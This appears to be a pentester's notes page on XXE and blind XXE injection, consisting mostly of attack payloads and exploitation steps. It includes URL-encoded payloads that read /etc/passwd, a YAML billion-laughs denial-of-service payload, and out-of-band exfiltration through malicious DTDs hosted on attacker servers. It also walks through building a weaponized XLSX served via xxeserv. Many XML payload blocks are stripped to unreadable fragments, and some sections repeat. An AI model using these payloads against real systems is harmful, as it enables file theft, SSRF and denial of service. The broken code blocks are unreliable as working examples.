# XXE
## XXE (XML external entity) injection
### What is it?
XML External Entity (XXE) vulnerabilities occur when an application processes XML input that includes a reference to an external entity. This vulnerability can occur in any technology that parses XML. By exploiting an XXE vulnerability, an attacker can read local files on the server, interact with internal systems, or conduct denial of service attacks.
**A simple example**
A vulnerable application might parse XML input from a user without disabling external entities. An attacker could then send XML like the following:
```
]>
&xxe;
```
In this case, the XML parser will replace `&xxe;` with the contents of the `/etc/passwd` file and include it in the output.
XXE can often lead to:
* Disclosure of internal files
* Server Side Request Forgery (SSRF)
* Denial of Service
* Remote Code Execution in some rare cases
**Other learning resources:**
* PortSwigger:
* OWASP:
**Writeups:**
## XXE (XML External Entity)
XXE is a type of attack against an application that parses XML input.
### Read Files
```
]>
&xxe;
https://vulnerable.com/set?data=%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22%2Fetc%2Fpasswd%22%3E%5D%3E%3Cconfig%3E%3Clocation%3E%26xxe%3B%3C%2Flocation%3E%3C%2Fconfig%3E
```
#### PHP Filter
```
]>
&xxe;
```
### Remote Code Execution
```
]>
&xxe;
https://vulnerable.com/set?data=%3C%3Fxml%20version%3D%221.0%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cconfig%3E%3Clocation%3E%26xxe%3B%3C%2Flocation%3E%3C%2Fconfig%3E
```
### SSRF attack
```
]>
&xxe;1
```
Also we can use the **Blind XXE** for exfiltrating data. Please refer to the [Blind XXE](https://exploit-notes.hdks.org/exploit/web/blind-xxe/) page.
### XInclude
```
POST /product/stock HTTP/1.1
...
productId=>&storeId=1
```
### File upload
```
]>
```
### Checklist
**Objective**
* [ ] Identify endpoints that can process XML
* [ ] Create a working XML payload that can be adapted to deliver exploits
* [ ] Test identified endpoints for XXE
**Attack surface discovery**
* [ ] Identify endpoints that accept XML payloads
* [ ] Review requests in proxy for XML data
* [ ] Identify endpoints that accept JSON by sending XML
* [ ] Identify endpoints that accept images by sending SVG images
* [ ] Identify endpoints that accept documents by sending DOCX or PDF files
* [ ] Test with the header `Content-Type: application/xml`
* [ ] Verify working XML payloads that can be adapted to deliver exploits
* [ ] Locate internal DTDs
**Testing**
* [ ] Test for external entities with a simple non-malicious payload
* [ ] Test for external entities with an available file (e.g. for Linux /etc/passwd)
* [ ] Test for external entities with an available endpoint you control (e.g. collaborator or webhook.site)
* [ ] Test for external entities with other available endpoints
* [ ] EC2 metadata endpoint `http://169.254.169.254/latest/meta-data`
* [ ] Test filters and restrictions
* [ ] Trigger error messages to exfiltrate information
* [ ] Test for denial of service
* [ ] Test for code execution
**Impact**
* [ ] Can we read sensitive files?
* [ ] Configuration files
* [ ] System files
* [ ] SQLite files
* [ ] SSH keys
* [ ] Can we exfiltrate sensitive information?
* [ ] Can we achieve code execution?
### Exploitation
**Sources**
* My pentest notes
* PortSwigger
* PayloadsAllTheThings
Detect XXE
```xml
]>
&xxe;
```
Include files\
\&#xNAN;*Note:* You might need `"file:///etc/passwd"`
```xml
]>
&xxe;
```
List files: *Note:* Restricted to Java applications
```xml
]>
&xxe;
```
Out-of-band:
```xml
]>
&xxe;
```
Parameter entities:
```xml
%xxe; ]>
```
Load an external DTD:
```xml
">
%eval;
%exfiltrate;
```
Execute code *Note:* Only works in the PHP 'expect' module is available
```xml
]>
&xxe;
```
**Include XML as a parameter value**
```xml
param=
```
**Other sources**
* Fuzzing for XXE
* Fuzzing for local DTDs
### Summary
{% hint style="info" %}
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
{% endhint %}
Detection:
```shellscript
# Content type "application/json" or "application/x-www-form-urlencoded" to "applcation/xml".
# File Uploads allows for docx/xlsx/pdf/zip, unzip the package and add your evil xml code into the xml files.
# If svg allowed in picture upload, you can inject xml in svgs.
# If the web app offers RSS feeds, add your milicious code into the RSS.
# Fuzz for /soap api, some applications still running soap apis
# If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse
```
Check:
```xml
]>
&test;
```
If works, then:
```xml
]>
&test;
```
## Blind XXE
### What is it?
Blind XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to an external entity, but does not return the outcome of the entity processing in the response. This makes the exploitation less direct since the attacker does not receive an immediate output from the injected payload. Blind XXE can be exploited to exfiltrate data, scan internal systems, or execute remote requests within the network that hosts the vulnerable application.
### Exploitation
Blind XXE using OOB
```xml
]>
&xxe;
```
Blind XXE using OOB with XML parameter entities
```xml
%xxe; ]>
```
Solution
```
1. Check the stock of an item and send the POST request with XML to repeater
2.
```
### Tools
```shellscript
# https://github.com/BuffaloWill/oxml_xxe
# https://github.com/enjoiz/XXEinjector
```
### Attacks
```shellscript
# Get PHP file:
]>
&test;
# Classic XXE Base64 encoded
%init; ]>
# Check if entities are enabled
]>
&test;
# XXE LFI:
]>&xxe;
# XXE Blind LFI:
]>&blind;
# XXE Access control bypass
]>
∾
# XXE to SSRF:
]>
# XXE OOB
%dtd;]>
&send;
# PHP Wrapper inside XXE
]>
Jean &xxe; Dupont00 11 22 33 4442 rue du CTF75000Paris
]>
&xxe;
# Deny Of Service - Billion Laugh Attack
]>
&a4;
# Yaml attack
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
# XXE OOB Attack (Yunusov, 2013)
&send;
File stored on http://publicServer.com/parameterEntity_oob.dtd
">
%all;
# XXE OOB with DTD and PHP filter
%sp;
%param1;
]>
&exfil;
File stored on http://92.222.81.2/dtd.xml
">
# XXE Inside SOAP
%dtd;]>]]>
# XXE PoC
]>&xxe_test;
]>&xxe_test;
]>&xxe_test;
# XXE file upload SVG
]>
# XXE Hidden Attack
- Xinclude
Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Set the value of the productId parameter to:
- File uploads:
Create a local SVG image with the following content:
]>
Post a comment on a blog post, and upload this image as an avatar.
When you view your comment, you should see the contents of the /etc/hostname file in your image. Then use the "Submit solution" but
```
## Blind XXE
XXE is a type of vulnerability that allows an attacker to inject and execute malicious XML code on a server that parses XML input, without directly receiving any feedback or response from the server.
### Data Exfiltration via Out-Of-Band
#### 1. Create a Malicious DTD
We need to prepare the dtd file (named **"exploit.dtd"** here) to retrieve the target file.\
Replace the ip address with your own.
```shellscript
">
%eval;
%exfiltrate;
```
Then host it on web server.
```shellscript
sudo python3 -m http.server 80
```
#### 2. Insert XXE
In http request body, insert the following XXE payload.\
Same as above DTD, replace the ip address with your own
```shellscript
%xxe;]>
```
Now send request. We might retrieve the local file of the target system via web server.
### Data Exfiltration via Out-Of-Band (Error-based)
If the website shows error messages when performing XXE, we can use the following malicious DTD.
```shellscript
">
%eval;
%exfil;
```
For the rest, please refer to the section above.
### Inside XLSX File
An XLSX file is a Microsoft Excel spreadsheet.
#### 1. Create a XLSX File
First we need to create a XLSX file using some software such as LibreOffice Calc.
#### 2. Extract the XLSX File
```
7z -oXXE xxe.xlsx
cd XXE
```
We should get files such as **“.xml”**.
#### 3. Add Blind XXE Payload in the XML File.
Insert the following payload into the **`xl/workbook.xml`**.\
Replace the **“10.0.0.1”** with your local ip address.
```shellscript
%asd;%c;]>
&rrr;
```
#### 4. Rebuild the XLSX File.
```shellscript
cd XXE
7z u ../xxe.xlsx *
```
#### 5. Create XXE inside a DTD File
Create **“xxe.dtd”**.\
Replace **“10.0.0.1”** with your local ip address.
```shellscript
">
```
#### 6. Start a local server
Serve the DTD file using [xxeserv](https://github.com/staaldraad/xxeserv).
```shellscript
git clone https://github.com/staaldraad/xxeserv.git
cd xxeserv
go mod init xxeftp.go
go build
go run xxeftp.go -o files.log -p 2121 -w -wd public -wp 8000
```
In another terminal, start a web server in the directory where “xxe.dtd” located.
```shellscript
sudo python3 -m http.server 80
```
Now upload **“xxe.xlsx”** file in the website. We should get the content of the desired file.
### References
* [PortSwigger](https://portswigger.net/web-security/xxe/blind)
### Mindmap
